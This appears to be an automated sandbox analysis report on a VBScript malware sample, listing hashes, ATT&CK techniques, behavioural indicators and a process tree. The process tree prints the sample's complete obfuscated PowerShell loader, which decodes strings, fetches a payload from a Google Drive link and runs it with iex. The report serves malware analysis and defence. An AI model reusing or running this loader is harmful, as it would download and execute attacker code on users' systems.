dd6342fe6aad393a8095cb0e7bda7835ad3712dd08659a73d33b94c4e6c89ac5

General

Target

dd6342fe6aad393a8095cb0e7bda7835ad3712dd08659a73d33b94c4e6c89ac5.vbs
Size

15KB
MD5

e9f75429771eea5902e035d06ace97a5
SHA1

4b0aa7016f426a2908ba3688e5b43a34c549e1f7
SHA256

dd6342fe6aad393a8095cb0e7bda7835ad3712dd08659a73d33b94c4e6c89ac5
SHA512

87007d2d712689b38bae910bd2463eef273d97d91f3a0efdd7e3885c03423ad327077369ebca1db533b94eaf2897f1421784f424899e7f7cbdfce69972b29b59
SSDEEP

384:kps7AWHH16GDlyqx2rmaTb9b+AuXJW4Bi+QyX84+wBLjlcDfu8LU0lfdFd1ksHDH:kps7AWHH16GDlyqx2rmaTb9b+AuXJW4k

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

5 2824 powershell.exe
9 2824 powershell.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

WScript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation WScript.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

4 drive.google.com
5 drive.google.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2120 PING.EXE
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

2824 powershell.exe
2824 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2824 powershell.exe

flow	pid	process
5	2824	powershell.exe
9	2824	powershell.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation	WScript.exe

flow	ioc
4	drive.google.com
5	drive.google.com

pid	process
2120	PING.EXE

pid	process
2824	powershell.exe
2824	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2824	powershell.exe

Suspicious use of WriteProcessMemory 8 IoCs

Processes:

WScript.execmd.exepowershell.exe

description	pid	process	target process
PID 2740 wrote to memory of 1724	2740	WScript.exe	cmd.exe
PID 2740 wrote to memory of 1724	2740	WScript.exe	cmd.exe
PID 1724 wrote to memory of 2120	1724	cmd.exe	PING.EXE
PID 1724 wrote to memory of 2120	1724	cmd.exe	PING.EXE
PID 2740 wrote to memory of 2824	2740	WScript.exe	powershell.exe
PID 2740 wrote to memory of 2824	2740	WScript.exe	powershell.exe
PID 2824 wrote to memory of 2476	2824	powershell.exe	cmd.exe
PID 2824 wrote to memory of 2476	2824	powershell.exe	cmd.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\dd6342fe6aad393a8095cb0e7bda7835ad3712dd08659a73d33b94c4e6c89ac5.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2740

C:\Windows\System32\cmd.exe
cmd.exe /c ping 6777.6777.6777.677e
2⤵
- Suspicious use of WriteProcessMemory
PID:1724

C:\Windows\system32\PING.EXE
ping 6777.6777.6777.677e
3⤵
- Runs ping.exe
PID:2120

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Sonanter = 1;$Jonnick184='Sub';$Jonnick184+='strin';$Jonnick184+='g';Function Frontlukket($Lollardist){$Chiccory70=$Lollardist.Length-$Sonanter;For($Haunted=7;$Haunted -lt $Chiccory70;$Haunted+=8){$Similiet30+=$Lollardist.$Jonnick184.Invoke( $Haunted, $Sonanter);}$Similiet30;}function Startskuddets($Insolvensbehandlings){&($Ufornuftigt) ($Insolvensbehandlings);}$Rappen=Frontlukket 'centrerMHaandfsoUnartfuzSkarkseiFra,lbyl Cana.ilBast,ntaS.ddans/Vastily5Midlert.Louchin0Origeni Unbeda(Sreg,nhW Ju.efeiGlasaalnSyningedPhyllacoP,loniuwse ittesTipstje iaisreN AridudT Boehmi Ap,arte1Horse y0 Spdere.Eegbry.0 S ngle;Met sym ObligatWCansoseiNiblicknTi sflg6Afrette4La.ngiv;Urdeesk DiskettxKlinger6Heresio4Undi.fe;Undersk oldtgtrO iginav.killio: aandva1Bevilli2Blodtyp1Sy,ygie. Faktur0Stavede)Absurdi Nonp,tGBaroksteHer,esocK.abbemkOxylabro lupga/Int.rda2La,mest0radiuse1humidl,0 Ca ico0Prorate1Macules0Hypertr1 Vrdian Toppl,cF Spr.yei,nathemrTarlataeDewlappfForbigaoCapistrxUafhngi/Indsnkn1Corusca2Lntager1algerie.F,mmesl0Schchtn ';$Subpredicate=Frontlukket 'MorfiniUAndensgs Lubbere temmerrProjek,-D.vlehoAJesu,trgObv,atoeDelinqun bevorstDefeatm ';$Bejdsningerne=Frontlukket 'Hotbedch Lill,btCh,bsfotD spachp andausGenkend: Ge,for/ Postnu/Chelingd ienerrGame eciFresiaevEccentreL.llipu.UndissogOreodonoAlismacoDueligegSkarlaglRepelafe Valla..Ballon cnickiesoSlg.snamPatenci/Ung,ltbuTomatssc Enker,? Sc,ewse exha,exSkrubsapCounte,o SubextrTextiletVarigst=AnglisedGrifledoBedrevrwStrivennsnedkkel Anfgteo Adelska Bloodsd Microc&SquirreiBlth,vedM lerku= Slathe1Handin o Pol.sp1 Anlgsan.uldtido.jsommeePseudogHFunktioG Melle.g EkspekFTraekistV rsifi6 Probos2S gnalb8Pennybi2ReservejEgomaniSRata,krdBiopsie2Syphilih ZazasuT UncompTNoninf 1Metamo g forbinWGymnas,4s.rfaceSNonfavoBRe,viem3makopabKMar,iteRFo.purryTissuelhRedries ';$fulgoroidea=Frontlukket 'Poww,wi>ileocol ';$Ufornuftigt=Frontlukket 'Ra quetiUrbanoseUnpro ixFlagell ';$Udemiljs='Precomputers';$metasomatic = Frontlukket 'SpndholeFiltendc paketbhMoulag o.uldkom Tricot,%OutpageamouldinpFred.kopNgenbildInterroaSlattintUdlandsaGrundru% .edenn\CoastedFMe ningo Veratrr PissegeTiggendh ,yrebre edligeaUndersarGoldhamtkompetehBygning.EksaltaCPyra,idySkolerybxeno,au Termino&Sustena&navnefl Aarel.deSkyggelcMik,oskhHypochnoTrykl,a PermutatCircums ';Startskuddets (Frontlukket 'Srkene $OnenklagSkraldgl Landzoo Digre,b LingulasoleusilGtepagt:TvegedeLUnfumediDivisionAdressej Fras,ge Overkrmanekdote Stiknilcanu.atl PacifieAbysse.mMercerirzizitdruIscenesmbillettmArrest,eStille.n Re,oiseDobbe,tsCecidom=Rosvrdi( Sl.fencSvrlemmm Triumvd Remani Udpakk/Dobbeltc Und,rg V,kerne$AmylogemNonsubjeAbdicattSuperala PolymnsconsubsoUdlsernmAfgrnsnaDovendytSynkreti Sno esc Cribbl)Sende u ');Startskuddets (Frontlukket 'Privine$TjekkisgFo,ladelPol,riso RatstabHindoo.aKlippehlTricket:TracheiUDisc pln Fje nts ,utlertDri.leni CecchifLethallfOverbuslDo,nsityGevrild=Tur,eld$ChudestBNonlitee ,rankijPr.oritdTelefonsNonsuccnAsbe,teiPkwyintnEfte,begEssayiseVidervrrpythononFicti eeMaryams. VulpecsOverflapSemiticlUkrnkeliKaolinstTestuds(Uhaandg$EndurobfPterodauUforbehlA,rikang TrbeskoCyclin,rPetromyo AcolytinondeprdIhndehaePri,talaHarteno)Non.ila ');$Bejdsningerne=$Unstiffly[0];$Indersides= (Frontlukket 'Buskpla$ StatsagA rappolChev sao Si,ewibSa,itaraAnkomstlsna ine: roconfWMedfrenh,ightelaBakspejmForeta,=RingvejNDepredaeMed,lisw Antire- andeltOAfbagnibFlks,gtjclowregeEngoldacHvalrostWearabl Be,rownSbirchenyBrn,parsAlle,omtNonmytheVertimemDoyleys.JurisprN Reim reBru.alitHelhed,. AalborWGaaen.eePosse,sbTangunpCC talonlChitteriNono aqeFo,eninn No.jurt');$Indersides+=$Linjemellemrummenes[1];Startskuddets ($Indersides);Startskuddets (Frontlukket ',nydebl$InsubmiWRealkrehStedbesaDiskontmSewer n.GisnligHsettledeudtrakdaSkelettdmisopaeeLong.igrBed.temsPlatitu[tattoos$phosgenSUds,ndeuAnneksrbaandsfrpBredbaarMrkh.areBespottdAbsurdiibotchy cPoliti a ommunitElf,orteAlfrida]Tyroles= Geru,r$Nephel,RKronraga lansfrp RostenpRundseneStengulnBadefor ');$Forvises=Frontlukket 'S errit$ BlomstWDeftlysh RoadabaAndroidmparfo,h. isoperDQuad isoFormletwOverpren.etshanlkrrerskoRecont,a Ratak,dKdfod.rFStyrekoiUkunstnlDefensoeFlelses(Yau ers$afbl,deBdehonesejosephijPutidnedK.ponklsS,ealtan RykkesiPaternonungeltggUnscieneAlting.r Han esnSynskreehybenet,Vildest$ Bort.eF An,eroiUndervidHrelr nupr.letacMiddag.iCudweeda Frigotl,bsprisl Chittay.jldnef)Spo,gio ';$Fiducially=$Linjemellemrummenes[0];Startskuddets (Frontlukket 'Beredel$PomeyspgBuoyanclFlagssaoLededesb Boged aBuibuimlNonspil:Spr,tepFInternoo RegripuTestkrsrUdhamresEmp.reucSil eabo BolsherStavefeeAplombe= Svrhed( Pa.atrTFlappi eSa,vifisValnddetP,llini-musimonPRaviol.a Mo.ogytSheitanhIldsjle Svaberg$antikviFMoerithiBu.hierdUnwhimsuHamburgcunderviiUncoaguaUmestell AutodklRe llnsy Bisisc),ptmejs ');while (!$Fourscore) {Startskuddets (Frontlukket 'Blindma$DuttenegFeudatolBlatheroBurbotmbForhjniaGrupposl piritu:AnalyseKPraemu m Bodicep,rgekldeSpotma,mFond,egsUrf,eldsHautboyiRidott,gLirellatSkraane=Synangi$ AdmonftOb,ervarTromleruRadiumseBerendo ') ;Startskuddets $Forvises;Startskuddets (Frontlukket ' TrivseSSubservtKastergaFireboarUntapertris,rbr-PaneldeSWindasil Me.apheIncorrieSegnosspl,eched Screelb4runknep ');Startskuddets (Frontlukket 'sekstma$.ldesvegHexokinlSw,thsto JankerbDiarrhoaRech cklf rvrel:Patc erFCatchieo FagmssuAuctio,rPiezocrs ,etrancskak atoingestararbejdseGtehust=Knoldbe(fis,uryTSimiadseKanaralsRei smatMarsson-Prose.yPAsnernea Enda stbersr.shRundsav Lako i$Affra.nFCiceroniEnvejskd,rikloruSemimancBurrowei OverslamelvieclVeratralstick,by.entnin)Beigefa ') ;Startskuddets (Frontlukket 'Levende$LithofegAltfortlNotioneo ,evertbMustarda IndvillPopulra:Telem kD Ride.tmTorde rt Sik.ereGennemfs,ernvrk1Grundgr1Fyrende3Dagdriv=Choksta$SiddebagLunarhelPita.ako LogikkbTiaarspa ,ndlbul D.nota:FoistedROmnipereUin,tagk Mi aebrKo,sulteSubteeneAkkvisir DiskoneNosedivn LagosadFngselseTubercus defere+tricyke+ belemr%Unwarra$ SubporUBlam,renTngermosAp rthetFlibberi FormidfSvartsif Fladpal Lo.aliy Megasc. AccelecProgramoIncommuuAmtskomn O.stndt Frazel ') ;$Bejdsningerne=$Unstiffly[$Dmtes113];}$Rindy=344313;$Uvsenets=30291;Startskuddets (Frontlukket 'acquain$ .olonigPfiz.rsl Vites.o StadigbNstversaKinetoglUde ilj: HalpnaAClawhamr I radis DomiciiToskillnExcandeiNaturalcParuria Spanier=Svovldi MoviegoGInesca,eImputret Miswre- merismC StraffoUdjvninnTillemptStegepoeFlavo rn Fritagt Hydrob Vbnere$SprogrgF,hrinkaiInt,ansd SandsyuRansagncar iereiBa.lonsaSponsorlStivenslMonethayMahogan ');Startskuddets (Frontlukket ' e.tomo$La.ghtegBilforslIldhubeo iametrb GldelsasuavermlCareful:BathrobwAreologr Yvereta,pithaliNicotinnB.otlics Cylindtpolitbua.ovedrev FundameOvera.c Bef ppe=poetlik Undepic[PlanmssSMisercly AtomvasKannev tSpontaneLikestim Thyr o.FravashCA.badido PlatycnKalendevpasteure Produkr besl gt,andyst]Spruike:Caseind: Chagr.FHamskifrNarkotioFer,elimRefe.enBAntiliba frdigusStarktleTankvog6Ma,uche4Casan.vSDissemitE.etrerrUdsonetiPs udopnPa.oramgCrusade(Snversy$Semip gARastlekrUngarnssKommandiHomesicn,nagetsiSa,mendcMetalum)Knebled ');Startskuddets (Frontlukket 'Vis.enp$Chewi,kgCresce lFavoritoInval dbDepo,ita MiniatlCan erw:StrmpefBU bitmieWinsomelpratil,a Svr.ervSynk ryeKamfertnfagkonsd Bittinetrachea Seroot=Kafet,a A.bejde[ TimpanSCi atioySi,harasTreei etV.cissieHeadwormP.eutil.Prefic TA,ocatoeShrinkpxKvator.tProne,r.TilbageE.ermaphnAphoriscMedgrlioForeigndmantisii Sub omnEksa engSpringt]Superim:Synecd :MainlinAVraalesS aaeresC onidioIGynanthIdefangs.W.eateaG stenogeRdkaaletEndomecS Video.tHoarkryrSlavofiiUnderkrnTetramegOtate.o(M difca$ Alsy ewG tearbr BiorytaBeskrmeiUtiliz.nSonarmasAdminist danaidaFlydevgvHilumuteRoundes)overgr. ');Startskuddets (Frontlukket ' Uddiff$KarossfgatabalglTubi looSl,tysubDrhamreaRheu.atlDaemony: KultivRO teomaeKlynkerkOpgrelsoPho ophnsl mpakv RdehavaLavemenluncran,eSpokings MomsercH.terodeMou tacn ErlggetBedenethSlfangej etraceFladvvem SkandesAnnonce1Resteri5Sneerer=.idespr$ForurolB,anktbeeDampvaslSingapoaHeliolav Disin.eAfhornenDvblinddK.nfituePreinse.DublantsAesculauCorantobMaumetrsConni atmeasurirStorhjei NautilnSelvbetg Skygge(Mellemr$triv.enRGeomorpiKo fliknNerviisdMoskm,ly Cove,t,Magtfak$.neluctU erberuvBjer.lasProrogueBi kerenKradsbueWoofingtRun bousBiometr)Jeanett ');Startskuddets $Rekonvalescenthjems15;"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2824

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Forehearth.Cyb && echo t"
3⤵
PID:2476

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

Remote System Discovery

1

T1018

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3zexzmbx.gfq.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/2824-0-0x00007FFE63123000-0x00007FFE63125000-memory.dmp

Filesize
8KB

Download
memory/2824-10-0x00000280F6CD0000-0x00000280F6CF2000-memory.dmp

Filesize
136KB

Download
memory/2824-11-0x00007FFE63120000-0x00007FFE63BE1000-memory.dmp

Filesize
10.8MB

Download
memory/2824-12-0x00007FFE63120000-0x00007FFE63BE1000-memory.dmp

Filesize
10.8MB

Download
memory/2824-17-0x00007FFE63120000-0x00007FFE63BE1000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing